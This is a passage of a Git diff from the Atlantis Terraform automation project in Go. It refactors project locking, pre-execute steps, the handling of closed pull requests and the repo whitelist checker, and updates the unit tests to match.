+ res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+ Ok(t, err)
+ Equals(t, true, res.LockAcquired)
+
+ // UnlockFn should work.
+ mockLocker.VerifyWasCalled(Never()).Unlock(lockKey)
+ err = res.UnlockFn()
+ Ok(t, err)
+ mockLocker.VerifyWasCalledOnce().Unlock(lockKey)
+}
+
+func TestDefaultProjectLocker_TryLockUnlocked(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockLocker := mocks.NewMockLocker()
+ locker := events.DefaultProjectLocker{
+ Locker: mockLocker,
+ }
+ expProject := models.Project{}
+ expWorkspace := "default"
+ expPull := models.PullRequest{Num: 2}
+ expUser := models.User{}
+
+ lockingPull := models.PullRequest{
+ Num: 2,
+ }
+ lockKey := "key"
+ When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+ locking.TryLockResponse{
+ LockAcquired: true,
+ CurrLock: models.ProjectLock{
+ Pull: lockingPull,
+ },
+ LockKey: lockKey,
+ },
+ nil,
+ )
+ res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+ Ok(t, err)
+ Equals(t, true, res.LockAcquired)
+
+ // UnlockFn should work.
+ mockLocker.VerifyWasCalled(Never()).Unlock(lockKey)
+ err = res.UnlockFn()
+ Ok(t, err)
+ mockLocker.VerifyWasCalledOnce().Unlock(lockKey)
+}
diff --git a/server/events/project_pre_execute.go b/server/events/project_pre_execute.go
deleted file mode 100644
index b9f1625336..0000000000
--- a/server/events/project_pre_execute.go
+++ /dev/null
@@ -1,140 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "path/filepath"
- "strings"
-
- "github.com/hashicorp/go-version"
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/locking"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
- "github.com/runatlantis/atlantis/server/events/terraform"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_pre_executor.go ProjectPreExecutor
-
-// ProjectPreExecutor executes before the plan and apply executors. It handles
-// the setup tasks that are common to both plan and apply.
-type ProjectPreExecutor interface {
- // Execute executes the pre plan/apply tasks.
- Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult
-}
-
-// DefaultProjectPreExecutor implements ProjectPreExecutor.
-type DefaultProjectPreExecutor struct {
- Locker locking.Locker
- ConfigReader ProjectConfigReader
- Terraform terraform.Client
- Run run.Runner
-}
-
-// PreExecuteResult is the result of running the pre execute.
-type PreExecuteResult struct {
- ProjectResult ProjectResult
- ProjectConfig ProjectConfig
- TerraformVersion *version.Version
- LockResponse locking.TryLockResponse
-}
-
-// Execute executes the pre plan/apply tasks.
-func (p *DefaultProjectPreExecutor) Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult {
- workspace := ctx.Command.Workspace
- lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User)
- if err != nil {
- return PreExecuteResult{ProjectResult: ProjectResult{Error: errors.Wrap(err, "acquiring lock")}}
- }
- if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num {
- return PreExecuteResult{ProjectResult: ProjectResult{Failure: fmt.Sprintf(
- "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
- lockAttempt.CurrLock.Pull.Num)}}
- }
- ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey)
- config, tfVersion, err := p.executeWithLock(ctx, repoDir, project)
- if err != nil {
- p.Locker.Unlock(lockAttempt.LockKey) // nolint: errcheck
- return PreExecuteResult{ProjectResult: ProjectResult{Error: err}}
- }
- return PreExecuteResult{ProjectConfig: config, TerraformVersion: tfVersion, LockResponse: lockAttempt}
-}
-
-// executeWithLock executes the pre plan/apply tasks after the lock has been
-// acquired. This helper func makes revoking the lock on error easier.
-// Returns the project config, terraform version, or an error.
-func (p *DefaultProjectPreExecutor) executeWithLock(ctx *CommandContext, repoDir string, project models.Project) (ProjectConfig, *version.Version, error) {
- workspace := ctx.Command.Workspace
-
- // Check if config file is found, if not we continue the run.
- var config ProjectConfig
- absolutePath := filepath.Join(repoDir, project.Path)
- if p.ConfigReader.Exists(absolutePath) {
- var err error
- config, err = p.ConfigReader.Read(absolutePath)
- if err != nil {
- return config, nil, err
- }
- ctx.Log.Info("parsed atlantis config file in %q", absolutePath)
- }
-
- // Check if terraform version is >= 0.9.0.
- terraformVersion := p.Terraform.Version()
- if config.TerraformVersion != nil {
- terraformVersion = config.TerraformVersion
- }
- constraints, _ := version.NewConstraint(">= 0.9.0")
- if constraints.Check(terraformVersion) {
- ctx.Log.Info("determined that we are running terraform with version >= 0.9.0. Running version %s", terraformVersion)
- if len(config.PreInit) > 0 {
- _, err := p.Run.Execute(ctx.Log, config.PreInit, absolutePath, workspace, terraformVersion, "pre_init")
- if err != nil {
- return config, nil, errors.Wrapf(err, "running %s commands", "pre_init")
- }
- }
- _, err := p.Terraform.Init(ctx.Log, absolutePath, workspace, config.GetExtraArguments("init"), terraformVersion)
- if err != nil {
- return config, nil, err
- }
- } else {
- ctx.Log.Info("determined that we are running terraform with version < 0.9.0. Running version %s", terraformVersion)
- if len(config.PreGet) > 0 {
- _, err := p.Run.Execute(ctx.Log, config.PreGet, absolutePath, workspace, terraformVersion, "pre_get")
- if err != nil {
- return config, nil, errors.Wrapf(err, "running %s commands", "pre_get")
- }
- }
- terraformGetCmd := append([]string{"get", "-no-color"}, config.GetExtraArguments("get")...)
- _, err := p.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, terraformGetCmd, terraformVersion, workspace)
- if err != nil {
- return config, nil, err
- }
- }
-
- stage := fmt.Sprintf("pre_%s", strings.ToLower(ctx.Command.Name.String()))
- var commands []string
- if ctx.Command.Name == Plan {
- commands = config.PrePlan
- } else {
- commands = config.PreApply
- }
- if len(commands) > 0 {
- _, err := p.Run.Execute(ctx.Log, commands, absolutePath, workspace, terraformVersion, stage)
- if err != nil {
- return config, nil, errors.Wrapf(err, "running %s commands", stage)
- }
- }
- return config, terraformVersion, nil
-}
diff --git a/server/events/project_pre_execute_test.go b/server/events/project_pre_execute_test.go
deleted file mode 100644
index 27814055f2..0000000000
--- a/server/events/project_pre_execute_test.go
+++ /dev/null
@@ -1,282 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "errors"
- "testing"
-
- "github.com/hashicorp/go-version"
- "github.com/mohae/deepcopy"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server/events"
- "github.com/runatlantis/atlantis/server/events/locking"
- lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
- "github.com/runatlantis/atlantis/server/events/mocks"
- "github.com/runatlantis/atlantis/server/events/models"
- rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
- tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
- "github.com/runatlantis/atlantis/server/logging"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var ctx = events.CommandContext{
- Command: &events.Command{
- Name: events.Plan,
- },
- Log: logging.NewNoopLogger(),
-}
-var project = models.Project{}
-
-func TestExecute_LockErr(t *testing.T) {
- t.Log("when there is an error returned from TryLock we return it")
- p, l, _, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_LockFailed(t *testing.T) {
- t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error")
- p, l, _, _ := setupPreExecuteTest(t)
- // The response has LockAcquired: false and the pull request is a number
- // different than the current pull.
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: false,
- CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}},
- }, nil)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure)
-}
-
-func TestExecute_ConfigErr(t *testing.T) {
- t.Log("when there is an error loading config, we return it")
- p, l, _, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreInitErr(t *testing.T) {
- t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it")
- p, l, tm, r := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
- PreInit: []string{"pre-init"},
- }, nil)
- tfVersion, _ := version.NewVersion("0.9.0")
- When(tm.Version()).ThenReturn(tfVersion)
- When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_InitErr(t *testing.T) {
- t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it")
- p, l, tm, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
- tfVersion, _ := version.NewVersion("0.9.0")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreGetErr(t *testing.T) {
- t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it")
- p, l, tm, r := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
- PreGet: []string{"pre-get"},
- }, nil)
- tfVersion, _ := version.NewVersion("0.8")
- When(tm.Version()).ThenReturn(tfVersion)
- When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_GetErr(t *testing.T) {
- t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it")
- p, l, tm, _ := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
- tfVersion, _ := version.NewVersion("0.8")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_PreCommandErr(t *testing.T) {
- t.Log("when we get an error running pre commands we return it")
- p, l, tm, r := setupPreExecuteTest(t)
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
- LockAcquired: true,
- }, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
- PrePlan: []string{"command"},
- }, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
- When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err"))
-
- res := p.Execute(&ctx, "", project)
- Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error())
-}
-
-func TestExecute_SuccessTF9(t *testing.T) {
- t.Log("when the project is on tf >= 0.9 it should be successful")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PreInit: []string{"pre-init"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
- When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion)
- r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")
-}
-
-func TestExecute_SuccessTF8(t *testing.T) {
- t.Log("when the project is on tf < 0.9 it should be successful")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PreGet: []string{"pre-get"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.8")
- When(tm.Version()).ThenReturn(tfVersion)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")
- r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")
-}
-
-func TestExecute_SuccessPrePlan(t *testing.T) {
- t.Log("when there are pre_plan commands they are run")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PrePlan: []string{"command"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
-
- res := p.Execute(&ctx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")
-}
-
-func TestExecute_SuccessPreApply(t *testing.T) {
- t.Log("when there are pre_apply commands they are run")
- p, l, tm, r := setupPreExecuteTest(t)
- lockResponse := locking.TryLockResponse{
- LockAcquired: true,
- }
- When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
- When(p.ConfigReader.Exists("")).ThenReturn(true)
- config := events.ProjectConfig{
- PreApply: []string{"command"},
- }
- When(p.ConfigReader.Read("")).ThenReturn(config, nil)
- tfVersion, _ := version.NewVersion("0.9")
- When(tm.Version()).ThenReturn(tfVersion)
-
- cpCtx := deepcopy.Copy(ctx).(events.CommandContext)
- cpCtx.Command = &events.Command{
- Name: events.Apply,
- }
- cpCtx.Log = logging.NewNoopLogger()
-
- res := p.Execute(&cpCtx, "", project)
- Equals(t, events.PreExecuteResult{
- ProjectConfig: config,
- TerraformVersion: tfVersion,
- LockResponse: lockResponse,
- }, res)
- r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply")
-}
-
-func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectPreExecutor, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) {
- RegisterMockTestingT(t)
- l := lmocks.NewMockLocker()
- cr := mocks.NewMockProjectConfigReader()
- tm := tmocks.NewMockClient()
- r := rmocks.NewMockRunner()
- return &events.DefaultProjectPreExecutor{
- Locker: l,
- ConfigReader: cr,
- Terraform: tm,
- Run: r,
- }, l, tm, r
-}
diff --git a/server/events/project_result.go b/server/events/project_result.go
index 94a6d3a468..80a3041aaf 100644
--- a/server/events/project_result.go
+++ b/server/events/project_result.go
@@ -17,7 +17,12 @@ import "github.com/runatlantis/atlantis/server/events/vcs"
// ProjectResult is the result of executing a plan/apply for a project.
type ProjectResult struct {
- Path string
+ ProjectCommandResult
+ RepoRelDir string
+ Workspace string
+}
+
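+// ProjectCommandResult is the result of running a specific command
+// (e.g. plan or apply) for a single project.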
+type ProjectCommandResult struct {
Error error
Failure string
PlanSuccess *PlanSuccess
diff --git a/server/events/pull_closed_executor.go b/server/events/pull_closed_executor.go
index 79dadeff0f..ec3ce6f825 100644
--- a/server/events/pull_closed_executor.go
+++ b/server/events/pull_closed_executor.go
@@ -38,24 +38,24 @@ type PullCleaner interface {
// PullClosedExecutor executes the tasks required to clean up a closed pull
// request.
type PullClosedExecutor struct {
- Locker locking.Locker
- VCSClient vcs.ClientProxy
- Workspace AtlantisWorkspace
+ Locker locking.Locker
+ VCSClient vcs.ClientProxy
+ WorkingDir WorkingDir
}
type templatedProject struct {
- Path string
+ RepoRelDir string
Workspaces string
}
var pullClosedTemplate = template.Must(template.New("").Parse(
"Locks and plans deleted for the projects and workspaces modified in this pull request:\n" +
"{{ range . }}\n" +
- "- path: `{{ .Path }}` {{ .Workspaces }}{{ end }}"))
+ "- dir: `{{ .RepoRelDir }}` {{ .Workspaces }}{{ end }}"))
// CleanUpPull cleans up after a closed pull request.
func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullRequest) error {
- if err := p.Workspace.Delete(repo, pull); err != nil {
+ if err := p.WorkingDir.Delete(repo, pull); err != nil {
return errors.Wrap(err, "cleaning workspace")
}
@@ -83,11 +83,11 @@ func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullReque
// buildTemplateData formats the lock data into a slice that can easily be
// templated for the VCS comment. We organize all the workspaces by their
// respective project paths so the comment can look like:
-// path: {path}, workspaces: {all-workspaces}
+// dir: {dir}, workspaces: {all-workspaces}
func (p *PullClosedExecutor) buildTemplateData(locks []models.ProjectLock) []templatedProject {
workspacesByPath := make(map[string][]string)
for _, l := range locks {
- path := l.Project.RepoFullName + "/" + l.Project.Path
+ path := l.Project.Path
workspacesByPath[path] = append(workspacesByPath[path], l.Workspace)
}
@@ -104,12 +104,12 @@ func (p *PullClosedExecutor) buildTemplateData(locks []models.ProjectLock) []tem
workspacesStr := fmt.Sprintf("`%s`", strings.Join(workspace, "`, `"))
if len(workspace) == 1 {
projects = append(projects, templatedProject{
- Path: p,
+ RepoRelDir: p,
Workspaces: "workspace: " + workspacesStr,
})
} else {
projects = append(projects, templatedProject{
- Path: p,
+ RepoRelDir: p,
Workspaces: "workspaces: " + workspacesStr,
})
diff --git a/server/events/pull_closed_executor_test.go b/server/events/pull_closed_executor_test.go
index e130a5304d..e295af5037 100644
--- a/server/events/pull_closed_executor_test.go
+++ b/server/events/pull_closed_executor_test.go
@@ -31,9 +31,9 @@ import (
func TestCleanUpPullWorkspaceErr(t *testing.T) {
t.Log("when workspace.Delete returns an error, we return it")
RegisterMockTestingT(t)
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
pce := events.PullClosedExecutor{
- Workspace: w,
+ WorkingDir: w,
}
err := errors.New("err")
When(w.Delete(fixtures.GithubRepo, fixtures.Pull)).ThenReturn(err)
@@ -44,11 +44,11 @@ func TestCleanUpPullWorkspaceErr(t *testing.T) {
func TestCleanUpPullUnlockErr(t *testing.T) {
t.Log("when locker.UnlockByPull returns an error, we return it")
RegisterMockTestingT(t)
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
l := lockmocks.NewMockLocker()
pce := events.PullClosedExecutor{
- Locker: l,
- Workspace: w,
+ Locker: l,
+ WorkingDir: w,
}
err := errors.New("err")
When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, err)
@@ -59,13 +59,13 @@ func TestCleanUpPullUnlockErr(t *testing.T) {
func TestCleanUpPullNoLocks(t *testing.T) {
t.Log("when there are no locks to clean up, we don't comment")
RegisterMockTestingT(t)
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
l := lockmocks.NewMockLocker()
cp := vcsmocks.NewMockClientProxy()
pce := events.PullClosedExecutor{
- Locker: l,
- VCSClient: cp,
- Workspace: w,
+ Locker: l,
+ VCSClient: cp,
+ WorkingDir: w,
}
When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, nil)
err := pce.CleanUpPull(fixtures.GithubRepo, fixtures.Pull)
@@ -89,7 +89,7 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "default",
},
},
- "- path: `owner/repo/.` workspace: `default`",
+ "- dir: `.` workspace: `default`",
},
{
"single lock, non-empty path",
@@ -99,7 +99,7 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "default",
},
},
- "- path: `owner/repo/path` workspace: `default`",
+ "- dir: `path` workspace: `default`",
},
{
"single path, multiple workspaces",
@@ -113,7 +113,7 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "workspace2",
},
},
- "- path: `owner/repo/path` workspaces: `workspace1`, `workspace2`",
+ "- dir: `path` workspaces: `workspace1`, `workspace2`",
},
{
"multiple paths, multiple workspaces",
@@ -135,17 +135,17 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "workspace2",
},
},
- "- path: `owner/repo/path` workspaces: `workspace1`, `workspace2`\n- path: `owner/repo/path2` workspaces: `workspace1`, `workspace2`",
+ "- dir: `path` workspaces: `workspace1`, `workspace2`\n- dir: `path2` workspaces: `workspace1`, `workspace2`",
},
}
for _, c := range cases {
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
cp := vcsmocks.NewMockClientProxy()
l := lockmocks.NewMockLocker()
pce := events.PullClosedExecutor{
- Locker: l,
- VCSClient: cp,
- Workspace: w,
+ Locker: l,
+ VCSClient: cp,
+ WorkingDir: w,
}
t.Log("testing: " + c.Description)
When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(c.Locks, nil)
diff --git a/server/events/repo_whitelist.go b/server/events/repo_whitelist.go
deleted file mode 100644
index 06c500f48b..0000000000
--- a/server/events/repo_whitelist.go
+++ /dev/null
@@ -1,69 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "strings"
-)
-
-// Wildcard matches 0-n of all characters except commas.
-const Wildcard = "*"
-
-// RepoWhitelist implements checking if repos are whitelisted to be used with
-// this Atlantis.
-type RepoWhitelist struct {
- // Whitelist is a comma separated list of rules with wildcards '*' allowed.
- Whitelist string
-}
-
-// IsWhitelisted returns true if this repo is in our whitelist and false
-// otherwise.
-func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) bool {
- candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName)
- rules := strings.Split(r.Whitelist, ",")
- for _, rule := range rules {
- if r.matchesRule(rule, candidate) {
- return true
- }
- }
- return false
-}
-
-func (r *RepoWhitelist) matchesRule(rule string, candidate string) bool {
- // Case insensitive compare.
- rule = strings.ToLower(rule)
- candidate = strings.ToLower(candidate)
-
- wildcardIdx := strings.Index(rule, Wildcard)
- if wildcardIdx == -1 {
- // No wildcard so can do a straight up match.
- return candidate == rule
- }
-
- // If the candidate length is less than where we found the wildcard
- // then it can't be equal. For example:
- // rule: abc*
- // candidate: ab
- if len(candidate) < wildcardIdx {
- return false
- }
-
- // Finally we can use the wildcard. Substring both so they're comparing before the wildcard. Example:
- // candidate: abcd
- // rule: abc*
- // substr(candidate): abc
- // substr(rule): abc
- return candidate[:wildcardIdx] == rule[:wildcardIdx]
-}
diff --git a/server/events/repo_whitelist_checker.go b/server/events/repo_whitelist_checker.go
new file mode 100644
index 0000000000..0e45401332
--- /dev/null
+++ b/server/events/repo_whitelist_checker.go
@@ -0,0 +1,69 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+ "strings"
+)
+
+// Wildcard matches zero or more of any character except a comma.
+const Wildcard = "*"
+
+// RepoWhitelistChecker checks whether repos are whitelisted to be used with
+// this Atlantis installation.
+type RepoWhitelistChecker struct {
+	// Whitelist is a comma-separated list of rules, with the wildcard '*' allowed.
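+	// Example: "github.com/owner/repo,github.com/myorg/*".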
+ Whitelist string
+}
+
+// IsWhitelisted returns true if this repo is in our whitelist and false
+// otherwise.
+func (r *RepoWhitelistChecker) IsWhitelisted(repoFullName string, vcsHostname string) bool {
+ candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName)
+ rules := strings.Split(r.Whitelist, ",")
+ for _, rule := range rules {
+ if r.matchesRule(rule, candidate) {
+ return true
+ }
+ }
+ return false
+}
+
+func (r *RepoWhitelistChecker) matchesRule(rule string, candidate string) bool {
+ // Case insensitive compare.
+ rule = strings.ToLower(rule)
+ candidate = strings.ToLower(candidate)
+
+ wildcardIdx := strings.Index(rule, Wildcard)
+ if wildcardIdx == -1 {
+		// No wildcard, so we can do a direct comparison.
+ return candidate == rule
+ }
+
+ // If the candidate length is less than where we found the wildcard
+ // then it can't be equal. For example:
+ // rule: abc*
+ // candidate: ab
+ if len(candidate) < wildcardIdx {
+ return false
+ }
+
+	// Finally, compare the substrings of both strings up to the wildcard. Example:
+ // candidate: abcd
+ // rule: abc*
+ // substr(candidate): abc
+ // substr(rule): abc
+ return candidate[:wildcardIdx] == rule[:wildcardIdx]
+}
diff --git a/server/events/repo_whitelist_checker_test.go b/server/events/repo_whitelist_checker_test.go
new file mode 100644
index 0000000000..d6f3f07e11
--- /dev/null
+++ b/server/events/repo_whitelist_checker_test.go
@@ -0,0 +1,158 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRepoWhitelistChecker_IsWhitelisted(t *testing.T) {
+ cases := []struct {
+ Description string
+ Whitelist string
+ RepoFullName string
+ Hostname string
+ Exp bool
+ }{
+ {
+ "exact match",
+ "github.com/owner/repo",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "exact match shouldn't match anything else",
+ "github.com/owner/repo",
+ "owner/rep",
+ "github.com",
